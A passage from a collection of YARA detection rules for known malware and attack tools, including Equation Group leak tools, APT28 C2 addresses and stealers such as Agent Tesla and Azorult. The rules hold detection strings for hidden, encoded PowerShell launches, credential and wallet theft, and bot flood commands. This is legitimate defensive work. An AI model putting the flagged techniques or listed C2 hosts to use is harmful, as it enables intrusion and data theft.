    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927"
    hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae"
  strings:
    $x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" ascii fullword
    $x2 = "Double Feature Target Version" ascii fullword
    $x3 = "DoubleFeature Process ID" ascii fullword
    $op1 = { A1 30 21 41 00 89 85 D8 FC FF FF A1 34 21 41 00 }
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 1 of them) or (2 of them)
}

rule EquationGroup_Toolset_Apr17__vtuner_vtuner_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431"
    hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e"
  strings:
    $s1 = "Unable to get -w hash.  %x" wide fullword
    $s2 = "!\"invalid instruction mnemonic constant Id3vil\"" wide fullword
    $s4 = "Unable to set -w provider. %x" wide fullword
    $op0 = { 2B C7 50 E8 3A 8C FF FF FF B6 C0 }
    $op2 = { A1 8C 62 47 00 81 65 E0 FF FF FF 7F 03 D8 8B C1 }
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 2 of them)
}

rule EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
    hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
    hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
  strings:
    $s1 = "Target is share name" ascii fullword
    $s2 = "Could not make UdpNetbios header -- bailing" ascii fullword
    $s3 = "Request non-NT session key" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of them)
}

rule EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6"
    hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
    hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
    hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
  strings:
    $x1 = "* Listening Post DLL %s() returned error code %d." ascii fullword
    $s1 = "WsaErrorTooManyProcesses" ascii fullword
    $s2 = "NtErrorMoreProcessingRequired" ascii fullword
    $s3 = "Connection closed by remote host (TCP Ack/Fin)" ascii fullword
    $s4 = "ServerErrorBadNamePassword" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of ($s*) or 1 of ($x*))
}

rule EquationGroup_Toolset_Apr17__SendCFTrigger_SendPKTrigger_6 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748"
    hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
  strings:
    $s4 = "* Failed to connect to destination - %u" wide fullword
    $s6 = "* Failed to convert destination address into sockaddr_storage values" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__AddResource {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0"
    hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff"
  strings:
    $s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" ascii fullword
    $s2 = "<PE path> - the path to the PE binary to which to add the resource." ascii fullword
    $s3 = "Unable to get path for target binary." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 2 of them)
}

rule EquationGroup_Toolset_Apr17__ESKE_RPC2_8 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
  strings:
    $s4 = "Fragment: Packet too small to contain RPC header" ascii fullword
    $s5 = "Fragment pickup: SmbNtReadX failed" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 716800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__LSADUMP_Lp_ModifyPrivilege_Lp_PacketScan_Lp_put_Lp_RemoteExecute_Lp_Windows_Lp_wmi_Lp_9 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
    hash2 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48"
    hash3 = "2d963529e6db733c5b74db1894d75493507e6e40da0de2f33e301959b50f3d32"
    hash4 = "e9f6a84899c9a042edbbff391ca076169da1a6f6dfb61b927942fe4be3327749"
    hash5 = "d989d610b032c72252a2df284d0b53f63f382e305de2a18b453a0510ab6246a3"
    hash6 = "23d98bca1f6e2f6989d53c2f2adff996ede2c961ea189744f8ae65621003b8b1"
    hash7 = "d7ae24816fda190feda6a60639cf3716ea00fb63a4bd1069b8ce52d10ad8bc7f"
  strings:
    $x1 = "Injection Lib -  " wide
    $x2 = "LSADUMP - - ERROR" wide
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__ETBL_ETRE_10 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
    hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
  strings:
    $x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" ascii fullword
    $x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" ascii fullword
    $s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
    hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
    hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
    hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
  strings:
    $x1 = "Target is vulnerable" ascii fullword
    $x2 = "Target is NOT vulnerable" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RideArea2_12 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
    hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
    hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e"
  strings:
    $x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and all of them)
}

rule EquationGroup_Toolset_Apr17__ELV_ESKE_13 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
    hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
  strings:
    $x1 = "Skip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored." ascii fullword
    $s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 614400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__NameProbe_SMBTOUCH_14 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597"
    hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
  strings:
    $s1 = "DEC Pathworks TCPIP service on Windows NT" ascii fullword
    $s2 = "<\\\\__MSBROWSE__> G" ascii fullword
    $s3 = "<IRISNAMESERVER>" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
    hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
    hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
  strings:
    $x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" ascii fullword
    $s8 = "Binding to RPC Interface %s over named pipe" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__ELV_ESKE_EVFR_16 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
    hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
    hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
  strings:
    $x1 = "ERROR: TbMalloc() failed for encoded exploit payload" ascii fullword
    $x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" ascii fullword
    $x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" ascii fullword
    $s6 = "Sending Implant Payload (%d-bytes)" ascii fullword
    $s7 = "ERROR: Encoder failed on exploit payload" ascii fullword
    $s11 = "ERROR: VulnerableOS() != RET_SUCCESS" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 1 of them)
}

rule EquationGroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    super_rule = 1
    hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
    hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
    hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
  strings:
    $x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" ascii fullword
    $s2 = "Target did not respond within specified amount of time" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and 1 of them)
}

rule EquationGroup_scanner_output {
  meta:
    description = "Detects output generated by EQGRP scanner.exe"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2017-04-17"
  strings:
    $s1 = "# Scan for windows boxes" ascii fullword
    $s2 = "Going into send" ascii fullword
    $s3 = "# Does not work" ascii fullword
    $s4 = "You are the weakest link, goodbye" ascii fullword
    $s5 = "rpc   Scan for RPC  folks" ascii fullword
  condition:
    filesize < 1024000 and 2 of them
}

rule COZY_FANCY_BEAR_Hunt {
  meta:
    description = "Detects Cozy Bear / Fancy Bear C2 Server IPs"
    author = "Florian Roth"
    reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
    date = "2016-06-14"
  strings:
    $s1 = "185.100.84.134" ascii wide fullword
    $s2 = "58.49.58.58" ascii wide fullword
    $s3 = "218.1.98.203" ascii wide fullword
    $s4 = "187.33.33.8" ascii wide fullword
    $s5 = "185.86.148.227" ascii wide fullword
    $s6 = "45.32.129.185" ascii wide fullword
    $s7 = "23.227.196.217" ascii wide fullword
  condition:
    uint16(0) == 23117 and 1 of them
}

rule COZY_FANCY_BEAR_pagemgr_Hunt {
  meta:
    description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report"
    author = "Florian Roth"
    reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
    date = "2016-06-14"
  strings:
    $s1 = "pagemgr.exe" wide fullword
  condition:
    uint16(0) == 23117 and 1 of them
}

rule APT_fancybear_Downdelph_magic : Bootkit {
  meta:
    author = "Marc Salinas @Bondey_m"
    description = "APT28 downdelph magic string"
    reference = "https://www.threatminer.org/_reports/2016/eset-sednit-part3%20-%20ESET.pdf#viewer.action=download"
  strings:
    $str1 = " :3 "
  condition:
    $str1 at 0
}

rule APT_fancybear_Downdelph_MBR : Bootkit {
  meta:
    author = "Marc Salinas @Bondey_m"
    description = "APT28 downdelph string on MBR (get your MBR with BOOTICE on Win or #dd if=/dev/sda of=./sda.mbr bs=512 count=1"
    reference = "https://www.threatminer.org/_reports/2016/eset-sednit-part3%20-%20ESET.pdf#viewer.action=download"
  strings:
    $s1 = { 20 3A 33 20 }
  condition:
    $s1 at 411
}

rule Furtim_nativeDLL {
  meta:
    description = "Detects Furtim malware - file native.dll"
    author = "Florian Roth"
    reference = "MISP 3971"
    date = "2016-06-13"
    hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
  strings:
    $s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" ascii fullword
    $op0 = { E0 B3 42 00 C7 84 24 AC }
    $op1 = { A1 E0 79 44 00 56 FF 90 10 01 00 00 A1 E0 79 44 }
    $op2 = { BF D0 25 44 00 57 89 4D F0 FF 90 D4 02 00 00 59 }
  condition:
    uint16(0) == 23117 and filesize < 921600 and $s1 or all of ($op*)
}

rule Furtim_Parent_1 {
  meta:
    description = "Detects Furtim Parent Malware"
    author = "Florian Roth"
    reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
    date = "2016-07-16"
    hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
  strings:
    $x1 = "dqrChZonUF" ascii fullword
    $s1 = "Egistec" wide fullword
    $s2 = "Copyright (C) 2016" wide fullword
    $op1 = { C0 EA 02 88 55 F8 8A D1 80 E2 03 }
    $op2 = { 5D FE 88 55 F9 8A D0 80 E2 0F C0 }
    $op3 = { C4 0C 8A D9 C0 EB 02 80 E1 03 88 5D F8 8A D8 C0 }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and ($x1 or (all of ($s*) and all of ($op*)))) or all of them
}

rule BeEF_browser_hooked {
  meta:
    description = "Yara rule related to hook.js, BeEF Browser hooking capability"
    author = "Pasquale Stirparo"
    date = "2015-10-07"
    hash1 = "587e611f49baf63097ad2421ad0299b7b8403169ec22456fb6286abf051228db"
  strings:
    $s0 = "mitb.poisonAnchor" ascii wide
    $s1 = "this.request(this.httpproto" ascii wide
    $s2 = "beef.logger.get_dom_identifier" ascii wide
    $s3 = "return (!!window.opera" ascii wide
    $s4 = "history.pushState({ Be:\"EF\" }" ascii wide
    $s5 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)" ascii wide
    $s6 = "window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)" ascii wide
    $s7 = "window.navigator.userAgent.match(/Avant TriCore/)" ascii wide
    $s8 = "window.navigator.userAgent.match(/Iceweasel" ascii wide
    $s9 = "mitb.sniff(" ascii wide
    $s10 = "Method XMLHttpRequest.open override" ascii wide
    $s11 = ".browser.hasWebSocket" ascii wide
    $s12 = ".mitb.poisonForm" ascii wide
    $s13 = "resolved=require.resolve(file,cwd||" ascii wide
    $s14 = "if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gm" ascii wide
    $s15 = "beef.net.request" ascii wide
    $s16 = "uagent.search(engineOpera)" ascii wide
    $s17 = "mitb.sniff" ascii wide
    $s18 = "beef.logger.start" ascii wide
  condition:
    all of them
}

rule GEN_PowerShell {
  meta:
    description = "Generic PowerShell Malware Rule"
    author = "https://github.com/interleaved"
  strings:
    $s1 = "powershell"
    $s2 = "-ep bypass" nocase
    $s3 = "-nop" nocase
    $s10 = "-executionpolicy bypass" nocase
    $s4 = "-win hidden" nocase
    $s5 = "-windowstyle hidden" nocase
    $s11 = "-w hidden" nocase
    $s8 = "-enc" nocase
    $s9 = "-encodedcommand" nocase
  condition:
    $s1 and (($s2 or $s3 or $s10) and ($s4 or $s5 or $s11) and ($s8 or $s9))
}

rule Generic_ATMPot : Generic_ATMPot {
  meta:
    description = "Generic rule for Winpot aka ATMPot"
    author = "xylitol@temari.fr"
    date = "2019-02-24"
    reference = "https://securelist.com/atm-robber-winpot/89611/"
  strings:
    $api1 = "CSCCNG" ascii wide
    $api2 = "CscCngOpen" ascii wide
    $api3 = "CscCngClose" ascii wide
    $string1 = "%d,%02d;" ascii wide
    $hex1 = { FF 15 ?? ?? ?? ?? F6 C4 80 }
    $hex2 = { 25 31 5B ?? 2D ?? 5D 56 41 4C 3D 25 38 5B 30 2D 39 5D }
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule ATM_HelloWorld : malware {
  meta:
    description = "Search strings and procedure in HelloWorld ATM Malware"
    author = "xylitol@temari.fr"
    date = "2019-01-13"
  strings:
    $api1 = "CscCngOpen" ascii wide
    $api2 = "CscCngClose" ascii wide
    $string1 = "%d,%02d;" ascii wide
    $string2 = "MAX_NOTES" ascii wide
    $hex_var1 = { FF 15 ?? ?? ?? ?? BF 00 80 00 00 85 C7 }
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule Windows_Malware : Azorult_V2 {
  meta:
    author = "Xylitol xylitol@temari.fr"
    date = "2017-09-30"
    description = "Match first two bytes, strings, and parts of routines present in Azorult"
    reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4819&p=30867"
  strings:
    $mz = { 4D 5A }
    $string1 = "ST234LMUV56CklAopq78Brstuvwxyz01NOPQRmGHIJKWXYZabcdefgDEFhijn9+/" ascii wide
    $string2 = "SYSInfo.txt"
    $string3 = "CookieList.txt"
    $string4 = "Passwords.txt"
    $constant1 = { 85 C0 74 40 85 D2 74 31 53 56 57 89 C6 89 D7 8B 4F FC 57 }
    $constant2 = { 68 ?? ?? ?? ?? FF 75 FC 68 ?? ?? ?? ?? 8D 45 F8 BA 03 00 }
  condition:
    ($mz at 0 and all of ($string*) and ($constant1 or $constant2) or cuckoo.sync.mutex(/Ad48qw4d6wq84d56as|Adkhvhhydhasdasashbc/))
}

rule Agenttesla {
  meta:
    description = "Detecting HTML strings used by Agent Tesla malware"
    author = "Stormshield"
    reference = "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/"
    version = "1.0"
  strings:
    $html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " ascii wide
    $html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " ascii wide
    $html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " ascii wide
    $html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " ascii wide
    $html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" ascii wide
  condition:
    3 of them
}

rule agenttesla_smtp_variant {
  meta:
    author = "J from THL <j@techhelplist.com> with thx to @Fumik0_ !!1!"
    date = "2018/2"
    reference1 = "https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection"
    reference2 = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a"
    reference3 = "Agent Tesla == negasteal -- @coldshell"
    version = 1
    maltype = "Stealer"
    filetype = "memory"
  strings:
    $a = "type={"
    $b = "hwid={"
    $c = "time={"
    $d = "pcname={"
    $e = "logdata={"
    $f = "screen={"
    $g = "ipadd={"
    $h = "webcam_link={"
    $i = "screen_link={"
    $j = "site_username={"
    $k = "[passwords]"
  condition:
    6 of them
}

rule almashreq_agent_dotnet : almashreq_agent_dotnet {
  meta:
    description = "Memory rule for a .net RAT/Agent first found with .pdb referencing almashreq"
    author = "J from THL <j@techhelplist.com> with thx to @malwrhunterteam !!1!"
    date = "2019-05-12"
    reference1 = "https://twitter.com/JayTHL/status/1127334608142503936"
    reference2 = "https://www.virustotal.com/#/file/f6e1e425650abc6c0465758edf3c089a1dde5b9f58d26a50d3b8682cc38f12c8/details"
    reference3 = "https://www.virustotal.com/#/file/7e4231dc2bdab53f494b84bc13c6cb99478a6405405004c649478323ed5a9071/detection"
    reference4 = "https://www.virustotal.com/#/file/3cbaf6ddba3869ab68baf458afb25d2c8ba623153c43708bad2f312c4663161b/detection"
    reference5 = "https://www.virustotal.com/#/file/0f5424614b3519a340198dd82ad0abc9711a23c3283dc25b519affe5d2959a92/detection"
    maltype = "agent"
    filetype = "memory"
  strings:
    $s01 = "WriteElementString(@\"PCName\"," wide
    $s02 = "WriteElementString(@\"Command\"," wide
    $s03 = "WriteElementStringRaw(@\"commandID\"," wide
    $s04 = /^Try Run$/ wide
    $s05 = " is running in PC :" wide
    $s06 = "SOAPAction: \"http://tempuri.org/Set\"" wide
    $s07 = "Try Run</obj><name>" wide
    $s08 = "Disable</obj><name>" wide
    $s09 = "http://tempuri.org/" wide
  condition:
    7 of them
}

rule alina {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-08-09"
    description = "Identify Alina"
  strings:
    $s1 = "Alina v1.0"
    $s2 = "POST"
    $s3 = "1[0-2])[0-9]"
  condition:
    all of them
}

rule andromeda {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-03-13"
    description = "Identify Andromeda"
  strings:
    $config = { 1C 1C 1D 03 49 47 46 }
    $c1 = "hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst"
  condition:
    all of them
}

rule Worm_Gamarue {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
    description = "Gamarue_Andromeda"
  strings:
    $a = { 69 E1 2A B0 2D 80 44 E3 2D 80 44 E3 2D 80 44 E3 EE 8F 1B E3 2A 80 44 E3 EE 8F 19 E3 3A 80 44 E3 2D 80 45 E3 CD 81 44 E3 0A 46 39 E3 34 80 44 E3 0A 46 29 E3 A5 80 44 E3 0A 46 2A E3 5C 80 44 E3 0A 46 36 E3 2C 80 44 E3 0A 46 3C E3 2C 80 44 E3 }
  condition:
    $a
}

rule andromeda_bot {
  meta:
    maltype = "Andromeda bot"
    author = "https://github.com/reed1713"
    description = "IOC looks for the creation or termination of a process associated with the Andromeda Trojan. The malware will execute the msiexec.exe within the suspicious directory. Shortly after, it creates and injects itself into the wuauctl.exe (windows update) process. It then attempts to beacon to its C2."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = "AppData\\Local\\Temp\\_.net_\\msiexec.exe"
  condition:
    all of them
}

rule Arkei : Arkei {
  meta:
    Author = "Fumik0_"
    Description = "Arkei Stealer"
    Date = "2018/07/10"
    Hash = "5632c89fe4c7c2c87b69d787bbf0a5b4cc535f1aa02699792888c60e0ef88fc5"
  strings:
    $s1 = "Arkei" ascii wide
    $s2 = "/server/gate" ascii wide
    $s3 = "/server/grubConfig" ascii wide
    $s4 = "\\files\\" ascii wide
    $s5 = "SQLite" ascii wide
  condition:
    all of ($s*)
}

rule AthenaHTTP {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-08-09"
    description = "Identify Athena HTTP"
  strings:
    $s1 = "%s(%s)"
    $s2 = "type:on_exec"
    $s3 = "uid:%s"
    $s4 = "priv:%s"
    $s5 = "arch:x%s"
    $s6 = "gend:%s"
    $s7 = "cores:%i"
    $s8 = "ver:%s"
    $s9 = "net:%s"
  condition:
    all of them
}

rule AthenaHTTP_v2 {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena HTTP identification"
    source = "https://github.com/arbor/yara/blob/master/athena.yara"
  strings:
    $fmt_str1 = "|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2 = "|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
    $cmd4 = "slowloris"
    $cmd5 = "rudy"
  condition:
    all of ($fmt_str*) and 3 of ($cmd*)
}

rule AthenaIRC {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
    source = "https://github.com/arbor/yara/blob/master/athena.yara"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
